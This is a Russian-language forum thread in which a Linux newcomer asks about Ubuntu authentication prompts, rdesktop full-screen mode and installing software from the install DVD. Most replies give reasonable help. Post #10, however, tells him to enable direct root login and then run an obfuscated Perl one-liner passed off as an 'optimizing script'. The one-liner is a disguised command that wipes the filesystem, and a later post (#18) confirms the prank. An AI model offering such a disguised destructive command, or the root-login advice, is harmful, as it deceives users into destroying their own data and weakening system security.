Постоянная аутентификация в Ubuntu. Как ее отключить #514872


#0 by arkada
При установке программ, либо при изменении настроек Ubuntu постоянно выдается запрос на аутентификацию. Статус пользователя - администратор, но приходится вводить пароль. Как отключить это?
#1 by Asmody
если подобные вопросы задаешь, то никак и ни в коем случае
#2 by Fragster
вот УАЦ в винде придумали, чобы как в убунте было, а ты отказываешься...
#3 by arkada
А поумнее есть советы?
#4 by Asmody
есть. ознакомиться хотя бы в общих чертах с архитектурой GNU/Linux в плане безопасности, после чего понять глупость вопроса в
#5 by arkada
Сообщество спецов. Раньше на мисте люди как-то проще были. Ребята если вы умнее, то не отвечайте на мои глупые вопросы, может и наёдется тот другой, который подскажет. Тему создал я, у меня проблема, я как раз и знакомлюсь с Linux.
#6 by kokamoonga
ну тебе человек и отвечает что не с той стороны ты начал знакомство. совет в более чем разумен имхо. и кстати, в чем проблема ввести пароль при установке пакетов или при настройке?
#7 by arkada
Я так понимаю, что нельзя, раз вы говорите о безопасности? По поводу с той или не стой стороны. Вы же все сами знаете, чтобы изучить ту или иную ОС требуется немало времени, а времени нет (поставлена задача развернуть рабочее место без Windows, дабы не платить за лицензионную windows, Office и т.д. Linux данную проблему решает) Тратить время на перелопачивание кучи материала (большая честь не нужная в данный момент) нет физически.
#8 by kokamoonga
неправильно понимаешь. с точки зрения безопасности - не стоит этого делать. по поводу убунты вместо выня так все просто. берешь десктоп 10.10 с миррор.яндекс и ставишь.
#9 by arkada
Может вы тогда дадите совет в следующем вопросе: Подключение к терминалу rdesktop -r printer:HP1600="HP Deskjet D1600 series" 192.168.x.x запускает в оконном режиме, если поставить ключ -f, то откроется на весь экран, а как потом из полноэкранного режима терминала переключиться в окно интерфейса ubuntu?
#10 by trash_tiger
Злой я сегодня. Лови. 1.Входим в консоль. 2. команда sudo -s - входим в систему под рутом по своим юзерским паролем. 3. команда whoami - убеждаемся, что теперь мы работаем под рутом. 4. команда passwd - меняем пароль рута. 5. дважды команда exit - выходим сначала из сеанса рута под суду, затем из собственного сеанса. Дальше "завершить сеанс" и при входе в гнум вручную набираем имя пользователя root. По особой злобе советую после входа применить оптимизурующий скрипт в консоли. echo "test... test... test..." | perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
#11 by kokamoonga
альт+ентер З.Ы. : пост не читай!))
#12 by arkada
Спасибо.
#13 by kokamoonga
контрл+альт+ентер)
#14 by arkada
ALT+ENTER не работает
#15 by arkada
приходится закрывать сеанс
#16 by Asmody
тогда нечего отключать. каждое действие по зменению системы нужно делать с пониманием. если кратко, то статус пользователя "администратор" совсем не означает, что ты можешь делать в системе все, что угодно. по-простому, "что угодно" в linux может делать только пользователь root. Статус "администратор" (где ты вообще такое взял?) означает лишь то, что твой пользователь может _на время_ и _по необходимости_ получать права рута. О чем тебя система и спрашивает каждый раз.
#17 by arkada
Вот, наконец народ вышел из спячки! Хоть кое-что начали рассказывать. На самом деле спасибо
#18 by trash_tiger
Да ладно. Система пустая. Переставить - 20 мин. Зато в другой раз неповадно будет.
#19 by kokamoonga
см. :)
#20 by arkada
Просто бывает есть такие вопросы, не сложные но не зная осно системы трудно понять такие простые вещи
#21 by kokamoonga
"сунь пальчик в розетку..." :)
#22 by Asmody
поди в установку приложений и поставь remmina. и используй xfreerdp
#23 by arkada
совет 13 помог. Спасибо большое, все вопросы, которые были вы мне помогли решить.
#24 by arkada
Всем спасибо за помощь
#25 by kokamoonga
+ с 10.10 доступно в репах. в 10.04 еще кучу пакетов доставить придется
#26 by kokamoonga
про реммину восприми всерьез. зело лучше рдесктопа. у меня все юзера на ней
#27 by arkada
Ок
#28 by arkada
Глянул Remmina - вещь!
#29 by Asmody
только в ней com-порты не пробрасываются (пока). т.е. со всякими сканерами-фискальниками засада
#30 by Asmody
+ и seamlessrdp тоже (пока) не работает. т.е. "прозрачной" интеграции rdp-окон пока не получится
#31 by arkada
Люди, а подскажите, пожалуйста про Центр приложений Ubuntu. У меня диск с Ubuntu 10.10 DVD. Когда я хочу что-то установить из списка, то всегда приложение качается с интернета. В "правка", "источник приложений" поставил галочку "устанавливаемые с дисков CD/DVD". Но ни одно приложение с диска так и не поставилось. Вообще находятся на инсталляционном диске с Ubuntu DVD хоть какие-либо программы из перечня центра приложений. Просто качать всё из инета не очень удобно.
#32 by kokamoonga
а то что у тебя куча всего установилось вместе с системой ты не учитываешь? это как раз с диска. все дополнительное ставится из репозиториев
Тэги: Unix / Linux
Ответить:
Комментарии доступны только авторизированным пользователям

В этой группе 1С